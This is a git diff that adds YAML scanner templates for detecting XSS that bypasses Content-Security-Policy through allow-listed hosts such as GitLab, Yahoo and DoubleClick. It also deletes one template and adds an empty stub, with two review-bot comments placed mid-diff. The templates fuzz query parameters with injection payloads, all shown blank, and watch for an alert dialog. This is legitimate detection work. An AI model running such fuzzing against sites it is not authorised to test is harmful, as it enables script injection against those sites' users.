Bypass via OvoEnergy - author: DhiyaneshDK - severity: high - reference: - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L99C1-L99C29 - metadata: - verified: true - tags: xss,csp-bypass,ovoenergy - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - '
' - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "ovoenergy.com" - - "script-src" - condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml b/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml new file mode 100644 index 00000000000..311b106b35f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml @@ -0,0 +1,55 @@ +id: page-gitlab-csp-xss + +info: + name: Content-Security-Policy Bypass via GitLab Page + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gitlab + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: page_gitlab_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "page_gitlab_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml b/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml new file mode 100644 index 00000000000..80d2ad8eaf0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml 
@@ -0,0 +1,55 @@
+id: partner-googleadservices-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Ad Services
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: partner_googleadservices_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "partner_googleadservices_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml
new file mode 100644
index 00000000000..b60606ee3e8
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: passport-baidu-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Baidu Passport
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,baidu
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: passport_baidu_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "passport_baidu_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml
new file mode 100644
index 00000000000..bf5462ed712
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pinterest-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Pinterest API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,pinterest
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: pinterest_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "pinterest_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml
new file mode 100644
index 00000000000..dedd42b0a36
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pixel-mathtag-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Mathtag Pixel
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,mathtag
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: pixel_mathtag_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "pixel_mathtag_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..00be5aedfa1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pixel-quantserve-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Quantserve Pixel
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,quantserve
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: pixel_quantserve_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "pixel_quantserve_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml
deleted file mode 100644
index 41d9793617f..00000000000
--- a/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml
+++ /dev/null
@@ -1,46 +0,0 @@ -id: pixplug-csp-xss - -info: - name: Content-Security-Policy Bypass via PixPlug - author: DhiyaneshDK - severity: high - reference: - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L174C20-L174C106 - metadata: - verified: true - tags: xss,csp-bypass,pixplug - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - '' - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "pixplug.in" - - "script-src" - condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml b/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml new file mode 100644 index 00000000000..0c692aaaf92 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml @@ -0,0 +1,55 @@ +id: portal-ayco-csp-xss + +info: + name: Content-Security-Policy Bypass via Ayco Portal + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ayco + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: portal_ayco_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "portal_ayco_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml new file mode 100644 index 00000000000..26b426bd4a0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml @@ -0,0 +1,55 @@ +id: pubads-doubleclick-csp-xss + +info: + name: Content-Security-Policy Bypass via DoubleClick PubAds + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,doubleclick + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: pubads_doubleclick_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "pubads_doubleclick_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml new file mode 100644 index 00000000000..c811b857770 --- /dev/null 
+++ b/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: public-api-wordpress-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via WordPress Public API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,wordpress
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: public_api_wordpress_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "public_api_wordpress_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml b/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml
new file mode 100644
index 00000000000..3bb93b99944
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: qq-c-y-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via QQ C.Y
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,qq
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: qq_c_y_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "qq_c_y_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml
new file mode 100644
index 00000000000..9210b67e546
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: query-fqtag-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via FQTag Query
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,fqtag
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: query_fqtag_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "query_fqtag_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml b/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml
new file mode 100644
index 00000000000..fd7ebad2dca
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: r-skimresources-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via SkimResources
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,skimresources
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: r_skimresources_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "r_skimresources_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml
new file mode 100644
index 00000000000..fe8581f1de9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IP-API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ip-api
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml b/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml
new file mode 100644
index 00000000000..0519ecba6ea
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml b/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml
new file mode 100644
index 00000000000..0606cf67b78
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml
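Review bot: The id `raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss`, the file name and the dialog name `raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss` embed what looks like a per-instance random subdomain label copied from the upstream data.tsv entry, while `name` calls the target simply IP-API. If that label is not part of the stable host the template keys on, rename the id to `ip-api-csp-xss` and the dialog to `ip_api_csp_xss` so the template stays greppable and its id does not have to change when the upstream entry rotates. The same naming convention should also be checked for the other ids in this series that are derived from data.tsv.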
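Review bot: `recaptcha-net-csp-xss.yaml` is added as a single whitespace line with no template body, so it will presumably fail to parse or be silently skipped when the `dast/vulnerabilities/xss/csp/` directory is loaded, and it contributes no detection while still counting as a template file. Either fill it in with the same `info`/`http`/`headless` structure as the sibling templates or drop it from this commit.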
@@ -0,0 +1,55 @@
+id: rentokil-domains-firebaseio-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Firebase Rentokil Domains
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,firebase
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: rentokil_domains_firebaseio_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "rentokil_domains_firebaseio_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml
new file mode 100644
index 00000000000..25ede2d8606
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: reveal-clearbit-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Clearbit Reveal
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,clearbit
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: reveal_clearbit_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "reveal_clearbit_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml
new file mode 100644
index 00000000000..f6b4f605b0f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ring-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Ring
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ring
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ring_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ring_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml
new file mode 100644
index 00000000000..726cd34ef8e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: romania-amazon-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Amazon Romania
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,amazon
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: romania_amazon_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "romania_amazon_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml
new file mode 100644
index 00000000000..40c30ccda79
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: s-fqtag-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via FQTag S
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,fqtag
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: s_fqtag_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "s_fqtag_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml b/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml
new file mode 100644
index 00000000000..b71a6aef785
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: s-ytimg-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YTImg S
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ytimg
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: s_ytimg_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "s_ytimg_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml
new file mode 100644
index 00000000000..ea79c71aadc
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: search-yahoo-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yahoo Search
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yahoo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: search_yahoo_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "search_yahoo_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml
new file mode 100644
index 00000000000..852f6816740
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-adnxs-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Secure Adnxs
